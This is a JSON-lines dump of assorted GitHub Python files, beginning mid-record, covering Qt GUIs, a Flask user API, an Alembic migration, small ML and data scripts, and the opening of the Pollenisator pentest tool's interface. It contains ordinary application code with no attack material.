splitter_1.addWidget(self.nt)\n splitter_1.addWidget(self.vt)\n splitter_1.addWidget(self.it)\n tabs.addTab(splitter_1, \"Image Data\")\n # self.it.hide()\n\n # 2. Time Annotation Tab\n tabs.addTab(self.at, \"Time Annotation\")\n\n # 3. Load/Save Tab\n splitter_3 = QSplitter(Qt.Vertical)\n splitter_3.addWidget(self.dt)\n splitter_3.addWidget(self.st)\n tabs.addTab(splitter_3, \"Load/Save Data\")\n\n self.main_layout.addWidget(tabs, alignment=Qt.AlignTop)\n\n # disable until called for the first time\n self.nt.list_widget.setEnabled(False)\n self.vt.setEnabled(False)\n self.st.setEnabled(False)\n\n def initialize_load_experiment(self):\n self.nt_pb.hide()\n self.lt_pb.hide()\n\n tabs = QTabWidget()\n\n # 1. Load Experiment Tab\n tabs.addTab(self.lt, \"Image Data\")\n\n # 2. Time Annotation Tab\n tabs.addTab(self.at, \"Time Annotation\")\n\n # 3. 
Load/Save Tab\n splitter_3 = QSplitter(Qt.Vertical)\n splitter_3.addWidget(self.dt)\n splitter_3.addWidget(self.st)\n tabs.addTab(splitter_3, \"Load/Save Data\")\n\n self.main_layout.addWidget(tabs)\n","repo_name":"LemonJust/napari-vodex","sub_path":"src/napari_vodex/_view.py","file_name":"_view.py","file_ext":"py","file_size_in_byte":42391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10937406779","text":"\"\"\"users table\nRevision ID: 4b83761bf52a\nRevises: 0d3bdf63aacc\nCreate Date: 2029-12-29 17:17:20.500426\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4b83761bf52a'\ndown_revision = '0d3bdf63aacc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('city', sa.String(length=64), nullable=True))\n op.add_column('user', sa.Column('description', sa.String(length=256), nullable=True))\n op.add_column('user', sa.Column('phone', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'phone')\n op.drop_column('user', 'description')\n op.drop_column('user', 'city')\n # ### end Alembic commands ###","repo_name":"stsl256/LMS_for_tinkoff","sub_path":"Lms/migrations/versions/4b83761bf52a_users_table.py","file_name":"4b83761bf52a_users_table.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34140946076","text":"from flask_restful import Resource, reqparse\nfrom models.user import UserModel\nfrom flask_jwt_extended import create_access_token, jwt_required, get_jwt\nfrom blocklist import BLOCKLIST\n\n\narguments = reqparse.RequestParser()\narguments.add_argument('login', type=str, required=True, help=\"This field cannot be empty.\")\narguments.add_argument('senha', type=str, required=True, help=\"This field cannot be empty.\")\n\n\nclass Users(Resource):\n def get(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n return user.json(), 200\n return {'message': 'User ID not found'}, 400\n \n\n @jwt_required()\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n try:\n user.delete_user()\n except:\n return {'message': 'An internal error occurred trying to delete user.'}, 500\n return {'message': 'User deleted.'}\n return {'message': 'User ID not found.'}, 400\n\n\nclass UsersRegister(Resource):\n def post(self):\n data = arguments.parse_args()\n\n if UserModel.find_by_login(data['login']):\n return {'message': 'This login already exists.'}, 401\n \n user = UserModel(**data)\n user.save_user()\n return {'message': 'User created successfully.', 'data': user.json()}, 200\n\n\nclass UserLogin(Resource):\n @classmethod\n def post(cls):\n data = arguments.parse_args()\n\n user = UserModel.find_by_login(data['login'])\n if user and user.senha == data['senha']:\n token = create_access_token(identity=user.user_id)\n return {'access_token': token}, 200\n return {'message':'The login or password is not correct.'}, 401\n\n\nclass UserLogout(Resource):\n @jwt_required()\n def post(self):\n jwt_id = get_jwt()['jti']\n BLOCKLIST.add(jwt_id)\n return {'message': 'Logged out successfully'}, 
200","repo_name":"ricardo-dantas97/api-course-python-flask","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16879861569","text":"import sys\nimport q1 as v\n\nfile=open(sys.argv[1],'r')\n\nm=[]\n\nfor line in file:\n\tm += list(map(int,line.rstrip().split()))\n\n\n\n\np=v.q1(m)\n\nprint(p)\n","repo_name":"sankethosalli/CS213","sub_path":"iitdh/pp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23877893921","text":"import glob\nimport os\n\nos.chdir('/home/abhisek/Desktop/YoloImages/Yolo-Annotation-Tool-New-/Labels/extra_class_frames')\n\nannts = []\ncnt = 0\n\nfor file in glob.glob('*.txt'):\n with open(file, 'r') as f:\n annts = f.read()\n f.close()\n if len(annts) == 0:\n os.remove(file)\n else:\n annt = annts.split()\n\n lines = ''\n # for i,val in enumerate(annt):\n # if i%5 == 4 and val == '0':\n # annt[i] = '81'\n\n for i,val in enumerate(annt):\n\n if i % 5 == 4 and len(val) <= 2:\n lines += (val + '\\n')\n elif len(val) <= 4:\n lines += (val + ',')\n\n if len(lines) > 0:\n with open(file, 'w') as f:\n f.write(lines)\n f.close()\n else:\n os.remove(file)","repo_name":"ad4529/Printer_Detection","sub_path":"Preprocessing Annotations/parse_annts_from_tool.py","file_name":"parse_annts_from_tool.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33850888692","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('healthcare-dataset-stroke-data.csv')\ndf.head(3)\ndf.describe()\ndf.isnull().sum()\nplt.figure(figsize=(10,8))\nsns.heatmap(df.corr(),annot=True)\nplt.show()\n\ndf=df.dropna().reset_index(drop=True)\ndf.isnull().sum()\ndf=df.drop(columns=['id'])\nplt.figure(figsize=(12,8))\ndf.boxplot()\nplt.show()\n\nfor i in df.select_dtypes(include=np.number).columns:\n sns.boxplot(df[i])\n plt.show()\ndf['hypertension'] = df['hypertension'].astype(object)\ndf['heart_disease'] = df['heart_disease'].astype(object)\ndf['stroke'] = df['stroke'].astype(object)\ndf_int=df.select_dtypes(include=np.number)\ndf_cat=df.select_dtypes(exclude=np.number)\ndf_int.head()\ndf_cat.head()\nfor i in df_cat:\n sns.countplot(df[i])\n plt.show()\n\npd.crosstab(df['ever_married'],df['stroke']).plot(kind='bar',stacked=True)\nplt.show()\npd.crosstab(df['work_type'],df['stroke']).plot(kind='bar',stacked=True)\nplt.show()\nplt.figure(figsize=(12,8))\nsns.kdeplot(df[df['stroke']==0]['age'],shade=True,label='no_stroke')\nsns.kdeplot(df[df['stroke']==1]['age'],shade=True,label='stroke')\nplt.xlabel('Age')\nplt.title('Stroke Density vs Age')\n\nplt.legend()\nplt.show()\nplt.figure(figsize=(12,8))\nsns.kdeplot(df[df['stroke']==0]['bmi'],shade=True,label='no_stroke')\nsns.kdeplot(df[df['stroke']==1]['bmi'],shade=True,label='stroke')\nplt.legend()\nplt.title('Stroke Density vs BMI ')\nplt.show()\n\n#trích xuất đặc trưng\nX=pd.get_dummies(df,columns=df_cat.columns,drop_first=True).iloc[:,:-2]\ny=pd.to_numeric(df['stroke'])\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test=train_test_split(X,y,stratify=y,random_state=8)\nfrom imblearn.over_sampling import SMOTE\nsmt = SMOTE(random_state=8)\nX_train_sm, y_train_sm = 
smt.fit_resample(X_train, y_train)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import classification_report\nknnsm=KNeighborsClassifier()\nknnsm.fit(X_train_sm,y_train_sm)\nprint('Train:',knnsm.score(X_train_sm,y_train_sm))\nprint('Test:',knnsm.score(X_test,y_test))\ny_pred_knnsm=knnsm.predict(X_test)\n\nprint(classification_report(y_test,y_pred_knnsm))","repo_name":"nguyentritrung19052000/Data_Visialization","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7808094917","text":"import sys\n\nimport os\nfrom PIL import Image\nprint('hello')\ninputPath=sys.argv[1]\nprint(inputPath)\noutputPath=sys.argv[2]\n\n\n\nif not os.path.exists(outputPath):\n os.mkdir(outputPath)\n# loop over the files in the input folder\nfor file in os.listdir(inputPath):\n openfile = os.path.join(inputPath, file)  # join safely even without a trailing slash\n img=Image.open(openfile)\n outfile = os.path.join(outputPath, os.path.splitext(file)[0] + '.png')  # replace the extension instead of appending 'png'\n img.save(outfile,'png')\n\n\n\n","repo_name":"dielianhua2020/firstTry","sub_path":"imgConverter.py","file_name":"imgConverter.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9490224438","text":"import io\n\nimport torch\nimport torch.nn as nn\nfrom nltk.tokenize import word_tokenize\nfrom torch.utils.data import Dataset\n\n\nclass GRUNet(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, n_layers, drop_prob=0.2):\n super(GRUNet, self).__init__()\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n self.gru = nn.GRU(input_size, hidden_size, n_layers,\n batch_first=True, dropout=drop_prob, bidirectional=True)\n self.linear = nn.Linear(2*hidden_size, output_size)\n self.linear1 = nn.Linear(output_size, 1)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input):\n out, hidden = self.gru(input)\n linear_out = self.linear(out[:, -1, :])\n linear_out = self.relu(linear_out)\n linear_out = self.linear1(linear_out)\n res = self.sigmoid(linear_out) * 6\n return res, hidden\n\n def init_hidden(self, batch_size, device, num_directions=2):\n weight = next(self.parameters()).data\n hidden = weight.new(self.n_layers * num_directions, batch_size,\n self.hidden_size).zero_().to(device)\n return hidden\n\n\nclass EfcamdatDataset(Dataset):\n def __init__(self, data, emb):\n self.data = data\n self.emb = emb\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n text = self.data.iloc[idx]['sentences']\n words = word_tokenize(text)\n word_ids = []\n for word in words:\n if word in self.emb:\n word_ids.append(torch.tensor(list(self.emb[word])))\n else:\n word_ids.append(torch.tensor(list(self.emb[\"UNK\"])))\n words = torch.stack(word_ids)\n target = torch.tensor(self.data.iloc[idx]['cefr_numeric'])\n return words, target, text\n\n# https://discuss.pytorch.org/t/how-to-create-a-dataloader-with-variable-size-input/8278/3\n\n\ndef load_vectors(fname):\n fin = io.open(fname, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n n, d = map(int, fin.readline().split())\n data = {}\n for line in fin:\n tokens = line.rstrip().split(' ')\n data[tokens[0]] = [float(x) for x in tokens[1:]]\n return data\n","repo_name":"Abby3017/text_complexity","sub_path":"model/trainable/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"35433055229","text":"from HandDetection import HandDetection\n\n\nclass Controller:\n def __init__(self, detector:HandDetection):\n self.Mouse = None\n self.Keyboard = None\n self.Gaming = None\n self.detector = detector\n\n \n def detectGesture(self, frame, hands):\n\n if len(hands) == 2:\n handL, handR = None, None\n handL = hands[0] if hands[0].get(\"type\") == \"Left\" else hands[1]\n handR = hands[0] if hands[0].get(\"type\") == \"Right\" else hands[1]\n\n fingersL, handInfoL = self.detector.fingersUpAndHandSide(handL)\n fingersR, handInfoR = self.detector.fingersUpAndHandSide(handR)\n\n if handInfoL[0][:-1] == \"Front\" == handInfoR[0][:-1] and handInfoL[1][:-1] == \"Up\" == handInfoR[1][:-1]:\n\n if 1 not in fingersL[2:4] and 1 not in fingersR[2:4] and fingersL[1] == fingersL[4] == 1 == fingersR[1] == fingersR[4]:\n dist, _, frame = self.detector.findDistance(handL.get(\"center\"), handR.get(\"center\"), frame)\n\n if dist < 220:\n self.setForMouse()\n\n elif 220 < dist < 330:\n self.setForKeyboard()\n\n elif dist > 330:\n self.setForGaming()\n\n return frame\n\n \n def getStatus(self):\n if self.Mouse:\n return \"Mouse\"\n elif self.Keyboard:\n return \"Keyboard\"\n elif self.Gaming:\n return \"Gaming\"\n\n\n def setForMouse(self):\n self.Mouse = True\n self.Keyboard = False\n self.Gaming = False\n print(\"Active: Mouse\")\n\n \n def setForKeyboard(self):\n self.Keyboard = True\n self.Mouse = False\n self.Gaming = False\n print(\"Active: Keyboard\")\n\n \n def setForGaming(self):\n self.Gaming = True\n self.Mouse = False\n self.Keyboard = False\n print(\"Active: Gaming\")\n","repo_name":"theutpal01/The-God-Hands","sub_path":"Gestures/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9289106633","text":"\nimport sqlite3\n\ndef query_data(db_path):\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n\n while True:\n person_id = input(\"Please enter a person's ID number or '-1' to exit: \")\n if person_id == '-1':\n break\n\n try:\n person_id = int(person_id)\n except ValueError:\n print(\"ID must be a number.\")\n continue\n cursor.execute(\"SELECT * FROM person WHERE id = ?\", (person_id,))\n person_data = cursor.fetchone()\n\n if person_data:\n first_name, last_name, age = person_data[1:4]\n print(f\"{first_name} {last_name}, {age} years old\")\n\n cursor.execute('''\n SELECT pet.name, pet.breed, pet.age, pet.dead\n FROM pet\n INNER JOIN person_pet ON pet.id = person_pet.pet_id\n WHERE person_pet.person_id = ?\n ''', (person_id,))\n pets_data = cursor.fetchall()\n\n for pet in pets_data:\n name, breed, age, dead = pet\n status = \"dead\" if dead else \"alive\"\n print(f\"{first_name} {last_name} owned {name}, a {breed}, that was {age} years old ({status})\")\n else:\n print(\"Person not found.\")\n\n conn.close()\n\nif __name__ == \"__main__\":\n db_path = \"pets.db\"\n query_data(db_path)\n","repo_name":"elepore/IS211_Elizabeth_Lepore","sub_path":"IS211_Assignment10/query_pets.py","file_name":"query_pets.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31651617318","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nh,w = 
map(int,input().split())\na = [list(map(int,input().split())) for _ in range(h)]\n\ninf = 10**10\ncost1 = [[inf] * w for _ in range(h)]\ncost2 = [[inf] * w for _ in range(h)]\ncost3 = [[inf] * w for _ in range(h)]\n\ncost1[-1][0] = 0\ncost2[-1][-1] = 0\ncost3[0][-1] = 0\n\nfor ct in [cost1,cost2,cost3]:\n remain = set()\n for i in range(h):\n for j in range(w):\n remain.add((i,j))\n for _ in range(h*w):\n cand = (inf,(-1,-1))\n for (i,j) in remain:\n if(cand[0] > ct[i][j]):\n cand = (ct[i][j],(i,j))\n i,j = cand[1]\n remain.remove((i,j))\n for x,y in zip([0,0,1,-1],[1,-1,0,0]):\n x += j\n y += i\n if(0<=x<w)&(0<=y<h):\n ct[y][x] = min(ct[y][x], ct[i][j] + a[y][x])\n\nans = inf\nfor i in range(h):\n for j in range(w):\n tmp = 0\n for ct in [cost1,cost2,cost3]:\n tmp += ct[i][j]\n tmp -= a[i][j]*2\n ans = min(ans,tmp)\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"past/past01/j.py","file_name":"j.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8282296075","text":"\"\"\"\nPollenisator client GUI window.\n\"\"\"\nimport traceback\nimport tkinter.filedialog\nimport tkinter as tk\nimport tkinter.messagebox\nimport tkinter.simpledialog\nimport tkinter.ttk as ttk\nimport uuid\nfrom customtkinter import *\nimport sys\nimport os\nfrom tkinter import TclError\nimport datetime\nimport json\nimport re\nfrom PIL import ImageTk, Image\nimport importlib\nimport pkgutil\nimport socketio\nfrom pollenisatorgui.core.application.dialogs.ChildDialogToolsInstalled import ChildDialogToolsInstalled\nfrom pollenisatorgui.core.application.scrollableframexplateform import ScrollableFrameXPlateform\nfrom pollenisatorgui.core.application.terminalswidget import TerminalsWidget\nfrom pollenisatorgui.core.components.datamanager import DataManager\nimport pollenisatorgui.core.components.utils as utils\nfrom pollenisatorgui.core.application.treeviews.PentestTreeview import PentestTreeview\nfrom pollenisatorgui.core.application.treeviews.CommandsTreeview import CommandsTreeview\nfrom pollenisatorgui.core.application.dialogs.ChildDialogCombo import ChildDialogCombo\nfrom pollenisatorgui.core.application.dialogs.ChildDialogQuestion import ChildDialogQuestion\nfrom pollenisatorgui.core.application.dialogs.ChildDialogConnect import ChildDialogConnect\nfrom pollenisatorgui.core.application.dialogs.ChildDialogPentests import ChildDialogPentests\nfrom pollenisatorgui.core.application.dialogs.ChildDialogException import ChildDialogException\nfrom pollenisatorgui.core.application.dialogs.ChildDialogFileParser import ChildDialogFileParser\nfrom pollenisatorgui.core.application.dialogs.ChildDialogEditPassword import ChildDialogEditPassword\nfrom pollenisatorgui.core.application.statusbar import StatusBar\nfrom pollenisatorgui.core.components.apiclient import APIClient, ErrorHTTP\nfrom pollenisatorgui.core.components.scanmanager import ScanManager\nfrom pollenisatorgui.core.components.admin import AdminView\nfrom pollenisatorgui.core.components.scriptmanager import ScriptManager\nfrom pollenisatorgui.core.components.settings import Settings\nfrom pollenisatorgui.core.components.filter import Filter\nfrom pollenisatorgui.core.controllers.toolcontroller import ToolController\nfrom pollenisatorgui.core.forms.formpanel import FormPanel\nfrom pollenisatorgui.core.models.port import Port\nfrom pollenisatorgui.core.views.checkinstanceview import CheckInstanceView\nfrom 
pollenisatorgui.core.views.checkitemview import CheckItemView\nfrom pollenisatorgui.core.views.ipview import IpView\nimport pollenisatorgui.modules\nimport customtkinter\nimport tkinterDnD\nfrom ttkwidgets import tooltips\nfrom pollenisatorgui.core.application.pollenisatorentry import PopoEntry\nfrom pollenisatorgui.core.components.logger_config import logger\nfrom pollenisatorgui.modules.module import Module\n\nclass FloatingHelpWindow(CTkToplevel):\n \"\"\"floating basic window with helping text inside\n Inherit tkinter TopLevel\n Found on the internet (stackoverflow) but did not keep link sorry...\n \"\"\"\n\n def __init__(self, w, h, posx, posy, *args, **kwargs):\n CTkToplevel.__init__(self, *args, **kwargs)\n self.title('Help: search')\n self.x = posx\n self.y = posy\n self.geometry(str(w)+\"x\"+str(h)+\"+\"+str(posx)+\"+\"+str(posy))\n self.resizable(0, 0)\n self.configure(bg='light yellow')\n self.grip = tk.Label(self, bitmap=\"gray25\")\n self.grip.pack(side=\"left\", fill=\"y\")\n label = tk.Label(self, bg='light yellow', fg='black',\n justify=tk.LEFT, text=Filter.help())\n label.pack()\n self.overrideredirect(True)\n self.grip.bind(\"<ButtonPress-1>\", self.startMove)\n self.grip.bind(\"<ButtonRelease-1>\", self.stopMove)\n self.grip.bind(\"<B1-Motion>\", self.onMotion)\n\n def startMove(self, event):\n \"\"\" Floating window dragging started\n Args:\n event: event.x and event.y hold the new position of the window\n \"\"\"\n self.x = event.x\n self.y = event.y\n\n def stopMove(self, _event=None):\n \"\"\" Floating window dragging stopped\n Args:\n _event: Not used but mandatory\n \"\"\"\n self.x = None\n self.y = None\n\n def onMotion(self, event):\n \"\"\" Floating window dragging ongoing\n Args:\n event: event.x and event.y hold the new position of the window\n \"\"\"\n deltax = event.x - self.x\n deltay = event.y - self.y\n x = self.winfo_x() + deltax\n y = self.winfo_y() + deltay\n self.geometry(\"+%s+%s\" % (x, y))\n\n\nclass AutocompleteEntry(PopoEntry):\n \"\"\"Inherit PopoEntry.\n An entry with an autocompletion ability.\n Found on the internet : http://code.activestate.com/recipes/578253-an-entry-with-autocompletion-for-the-tkinter-gui/\n But a bit modified.\n \"\"\"\n\n def __init__(self, settings, *args, **kwargs):\n \"\"\"Constructor\n Args:\n settings: a dict of Settings:\n * histo_filters: number of history search to display\n args: not used\n kwargs: \n * width: default to 100\n \"\"\"\n PopoEntry.__init__(self, *args, **kwargs)\n self.width = kwargs.get(\"width\",100)\n self.lista = set()\n self.var = self.cget(\"textvariable\")\n if self.var is None:\n self.var = tk.StringVar()\n self.configure(textvariable=self.var)\n self.var.trace('w', self.changed)\n \n self.bind(\"<Right>\", self.selection)\n self.bind(\"<Up>\", self.upArrow)\n self.bind(\"<Down>\", self.downArrow)\n self.settings = settings\n self.server_time = None\n self.lb = None\n self.lb_up = False\n \n\n def changed(self, _name=None, _index=None, _mode=None):\n \"\"\"\n Called when the entry is modified. 
Perform autocompletion.\n Args:\n _name: not used but mandatory for tk.StringVar.trace\n _index: not used but mandatory for tk.StringVar.trace\n _mode: not used but mandatory for tk.StringVar.trace\n \"\"\"\n words = self.comparison()\n if words:\n if not self.lb_up:\n self.lb = tk.Listbox(width=self.width, fg=utils.getTextColor(), bg=utils.getBackgroundColor())\n self.lb.bind(\"<Double-Button-1>\", self.selection)\n self.lb.bind(\"<Right>\", self.selection)\n self.lb.bind(\"<Leave>\", self.quit)\n self.bind(\"<Escape>\", self.quit)\n self.lb.place(x=self.winfo_x()+133,\n y=self.winfo_y()+self.winfo_height()+20)\n self.lb_up = True\n self.lb.delete(0, tk.END)\n for w in words:\n self.lb.insert(tk.END, w)\n else:\n self.quit()\n\n def quit(self, _event=None):\n \"\"\"\n Callback function to destroy the label shown\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n self.lb.destroy()\n self.lb_up = False\n \n def reset(self):\n \"\"\"\n quit and reset filter bar\n \"\"\"\n self.quit()\n self.var.set(\"\")\n\n def selection(self, _event=None):\n \"\"\"\n Called when an autocompletion option is chosen. \n Change entry content and close autocomplete.\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n self.var.set(self.lb.get(tk.ACTIVE))\n self.lb.destroy()\n self.lb_up = False\n self.icursor(tk.END)\n #self.changed()\n\n def upArrow(self, _event=None):\n \"\"\"\n Called when the up arrow is pressed. Navigate in autocompletion options\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n if self.lb.curselection() == ():\n index = '0'\n else:\n index = self.lb.curselection()[0]\n if index != '0':\n self.lb.selection_clear(first=index)\n index = str(int(index)-1)\n self.lb.selection_set(first=index)\n self.lb.activate(index)\n\n def downArrow(self, _event=None):\n \"\"\"\n Called when the down arrow is pressed. Navigate in autocompletion options\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n if self.lb.curselection() == ():\n index = '0'\n else:\n index = self.lb.curselection()[0]\n if index != tk.END:\n self.lb.selection_clear(first=index)\n index = str(int(index)+1)\n self.lb.selection_set(first=index)\n self.lb.activate(index)\n\n def comparison(self):\n \"\"\"\n Search suggestions in regard of what is in the entry\n \"\"\"\n values = set(self.settings.local_settings.get(\"histo_filters\", []))\n self.lista = values\n content = self.var.get().strip()\n if content == \"\":\n return []\n pattern = re.compile('.*' + re.escape(content) + '.*')\n return [w for w in self.lista if re.match(pattern, w)]\n\ndef iter_namespace(ns_pkg):\n # Specifying the second argument (prefix) to iter_modules makes the\n # returned name an absolute name instead of a relative one. 
This allows\n # import_module to work without having to do additional modification to\n # the name.\n return pkgutil.iter_modules(ns_pkg.__path__, ns_pkg.__name__ + \".\")\n\nclass ButtonNotebook(CTkFrame):\n def __init__(self, parent, callbackSwitch, closeCallbackSwitch):\n super().__init__(parent)\n style = ttk.Style()\n self.frameButtons = CTkFrame(self, fg_color=('#113759'))\n self.callbackSwitch = callbackSwitch\n self.closeCallbackSwitch = closeCallbackSwitch\n self.tabs = {}\n self.current = None\n self.frameButtons.pack(side=\"left\", anchor=\"nw\", fill=tk.Y)\n self.btns = {}\n self.lbl = None\n\n def add(self, widget, name, order, image):\n if name not in self.tabs:\n self.tabs[name] = {\"widget\":widget, \"image\":image, \"order\": order, \"name\":name}\n widget.pack_forget()\n btn = CTkButton(self.frameButtons, text=name, image=image, fg_color='#113759' , hover_color=('#061b4e'), compound=tk.TOP)\n self.btns[name] = btn\n btn.bind(\"<Button-1>\", self.clicked)\n self.redraw()\n \n\n def redraw(self):\n for btn in self.btns.values():\n btn.pack_forget()\n if self.lbl:\n self.lbl.pack_forget()\n btns = sorted(self.tabs.values(), key=lambda x:x[\"order\"])\n for btn in btns:\n \n self.btns[btn[\"name\"]].pack(side=\"top\", fill=tk.X, anchor=\"nw\")\n self.image = Image.open(utils.getIcon(\"LogoPollenisator.png\"))\n img = CTkImage(light_image=self.image, dark_image=self.image, size=(100, 123))\n self.lbl = CTkLabel(self.frameButtons, text=\"\", image=img)\n self.lbl.pack(side=\"bottom\", fill=tk.X, pady=5,anchor=\"sw\")\n\n def clicked(self, event):\n widget = event.widget.master\n name = widget.cget(\"text\")\n self.select(name)\n\n def getOpenTabName(self):\n return self.current\n\n\n def delete(self, name):\n if name in self.tabs:\n del self.tabs[name]\n self.btns[name].pack_forget()\n\n def select(self, name):\n if self.current == name:\n return\n if self.current:\n self.tabs[self.current][\"widget\"].pack_forget()\n self.btns[self.current].configure(fg_color=\"#113759\")\n\n self.closeCallbackSwitch(self.current, name)\n self.current = name\n self.btns[name].configure(fg_color=\"#061b4e\")\n self.tabs[name][\"widget\"].pack(side=\"right\", expand=True, anchor=\"center\", fill=tk.BOTH)\n self.callbackSwitch(name)\n\n\nclass Appli(customtkinter.CTk, tkinterDnD.tk.DnDWrapper):#HACK to make work tkdnd with CTk\n \"\"\"\n Main tkinter graphical application object.\n \"\"\"\n version_compatible = \"2.6.*\"\n\n \n def _init_tkdnd(master: tk.Tk) -> None: #HACK to make work tkdnd with CTk\n \"\"\"Add the tkdnd package to the auto_path, and import it\"\"\"\n #HACK Copied from directory with a package_dir updated\n platform = master.tk.call(\"tk\", \"windowingsystem\")\n\n if platform == \"win32\":\n folder = \"windows\"\n elif platform == \"x11\":\n folder = \"linux\"\n elif platform == \"aqua\":\n folder = \"mac\"\n package_dir = os.path.join(os.path.dirname(os.path.abspath(tkinterDnD.tk.__file__)), folder)\n master.tk.call('lappend', 'auto_path', package_dir)\n TkDnDVersion = master.tk.call('package', 'require', 'tkdnd')\n return TkDnDVersion\n\n def __init__(self):\n \"\"\"\n Initialise the application\n\n \"\"\"\n # Lexic:\n # view frame : the frame in the tab that will hold forms.\n # Tree view : the tree on the left of the window.\n # frame tree view : a frame around the tree view (useful to attach a scrollbar to a treeview)\n # paned : a Paned widget is used to separate two other widgets and display a one over the other if desired\n # Used to separate the treeview frame and view 
frame.\n super().__init__()\n self.TkDnDVersion = self._init_tkdnd() #HACK to make work tkdnd with CTk\n self.quitting = False\n self.settingViewFrame = None\n self.scanManager = None # loaded on first click (Linux only)\n self.scanViewFrame = None\n self.admin = None\n self.nbk = None\n self.notif_handlers = []\n self.sio = None #socketio client\n self.initialized = False\n self.settings = Settings()\n\n utils.setStyle(self, self.settings.local_settings.get(\"dark_mode\", False))\n self.main_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_main.png\"), size=(30, 30))\n self.commands_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_commands.png\"), size=(30, 30))\n self.scan_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_scan.png\"), size=(30, 30))\n self.settings_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_settings.png\"), size=(30, 30))\n self.admin_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_admin.png\"), size=(30, 30))\n # HISTORY: Main view and command view were historically in the same view;\n # this results in lots of widgets here with a confusing naming style\n #### core components (left tab-menu objects) ####\n #### MAIN VIEW ####\n self.mainPageFrame = None\n self.paned = None\n self.proxyFrameMain = None\n self.viewframe = None\n self.frameTw = None\n self.treevw = None\n self.datamanager = None\n self.terminals = None\n self.myscrollbarMain = None\n #### COMMAND VIEW ####\n self.commandsPageFrame = None\n self.commandPaned = None\n self.commandsFrameTw = None\n self.commandsViewFrame = None\n self.myscrollbarCommand = None\n self.commandsTreevw = None\n #### SEARCH BAR ####\n # boolean set to true when the main tree view is displaying search results\n self.searchMode = False\n self.searchBar = None # the search bar component\n self.btnHelp = None # help button on the right of the search bar\n self.photo = None # the ? 
image\n self.helpFrame = None # the floating help frame poping when the button is pressed\n dir_path = utils.getIconDir() +\"favicon.png\"\n img = tk.PhotoImage(file=dir_path)\n self.resizable(True, True)\n self.iconphoto(True, img)\n self.minsize(width=400, height=400)\n self.resizable(True, True)\n self.title(\"Pollenisator\")\n \n self.geometry(f\"{self.winfo_screenwidth()}x{self.winfo_screenheight()}\")\n self.protocol(\"WM_DELETE_WINDOW\", self.onClosing)\n self.datamanager = DataManager.getInstance()\n self.initModules()\n apiclient = APIClient.getInstance()\n self.topviewframe = None\n self.scanManager = ScanManager(self, self.nbk, self.treevw, apiclient.getCurrentPentest(), self.settings)\n apiclient.appli = self\n opened, errored = self.openConnectionDialog()\n if errored:\n return\n if not opened:\n try:\n self.wait_visibility()\n except tk.TclError: #closed dialog\n return\n opened, errored = self.openConnectionDialog(force=True)\n if errored:\n return\n self.openPentestsWindow()\n self.loadModulesInfos() \n self.scanManager.nbk = self.nbk #FIXME ORDER, INITIALISATION of SCAN MANAGERis too early\n self.scanManager.linkTw = self.treevw\n\n\n def start_autoscan(self):\n return 